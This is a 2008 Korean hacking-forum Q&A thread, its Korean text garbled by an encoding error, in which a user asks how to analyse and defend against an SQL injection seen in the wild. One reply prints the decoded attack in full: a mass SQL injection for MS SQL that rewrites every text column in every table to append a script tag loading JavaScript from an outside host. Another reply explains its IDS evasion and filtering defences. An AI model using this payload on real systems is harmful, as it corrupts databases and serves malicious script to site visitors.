|
|
|
|
|
|
|
|
|
|
|
|
|
423, 7/22 |
|
youngman0707 | |||||||
sqlÀÎÁ§¼Ç¹®Á¦Àä...ÄÚµåºÐ¼®Á¡ ºÎŹµå¸³´Ï´Ù.. | |||||||
http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=382 [º¹»ç]
Hit : 3755 Date : 2008/11/10 03:27
|
|||||||
youngman0707 | Á¦°¡ Áö½ÄÀ̾è¾Æ¼ ..ÀÌ·±°Å¹ß»ýÇßÀ»¶§..¾î¶»°Ô ºÐ¼®..±×¸®°í º¸¾ÈÇؾߵǴÂÁö ..°í¼ö´ÔµéÀÇ Àâ´ÙÇÑ ÇѸ»¾¹ºÎŹµå¸³´Ï´Ù.. Àâ´ÙÇÑ ÇѸ»¾¹ÀÌ Àú¿¡°Õ Å«ÈûÀ̵˴ϴÙ.. ¿À´Ãµµ Áñ°Å¿î ÇϷ纸³»¼¼¿ä.. |
2008/11/10 | |
ÃʵùÇØÄ¿ | ÈÉ.. ÄO¾Æ Âü Çè³Çϱ¸³ª.. ÄO phpÁ» ÇÒÁپ˾Æ? <? echo(urldecode("$str")); ?> À§ ÀÌ»óÇÑ ¹®ÀÚ¿À» ¿ä±â $str ÀÎÀÚ·Î Àü´ÞÇϸé Á» ¸¶À½ÀÌ ¾ÈÁ¤µÉ²¿¾ß |
2008/11/10 | |
pr0sp3r | Çì´õºÎºÐÀº ³¯¸®°í ½ÇÁ¦ °ø°Ý Äõ¸®´Â 0xºÎÅÍ Çí»ç°ªº¯Á¶ÈÄ urndecode Çϸé¾Æ·¡¿Í °°ÀÌ µË´Ï´Ù.<br /> <br /> %' ;dEcLaRe @S VaRcHaR(4000) SeT @s=DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE [' @T '] SET [' @C ']=RTRIM(CONVERT(VARCHAR(4000),[' @C '])) ''<script src=http://s.cawjb.com/s.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Curso aS VaRcHaR(4000));eXeC(@s);-- aNd '%'= |
2008/11/11 | |
k1rha | ¿äÁò ÀÌÄÚµå Á¤¸» ÀÚÁÖº¸°Ô µÇ³×¿ä ¤»¤» mass sql injection °ø°ÝÀä, ½ÇÁ¦·Î ¹æ¾î¹ýÀº ¿øõÀûÀ¸·Î sql injection ¹æ¾î¹ý°ú °°½À´Ï´Ù¸¸, mass sql ÀÇ ÈµÎ°¡ µÈÀÌÀ¯´Â IDS IPS ¸¦ ¿ìȸ ÇÒ¼ö ÀÖ´Ù´Â Á¡ÀÔ´Ï´Ù. ÀÌÁ¡À» ºñ·ÔÇØ ¹æ¾î¹ýÀ» ¼³¸íµå¸®ÀÚ¸é ÇÊÅ͸µ ±¸¹®¿¡ mass sql ¸¸ÀÇ ±¸¹®À» ÇÊÅ͸µ ÇØÁÖ¸é µÈ´Ù°í ÇÏ´õ±º¿ä ... | 2008/11/14 | |
|
|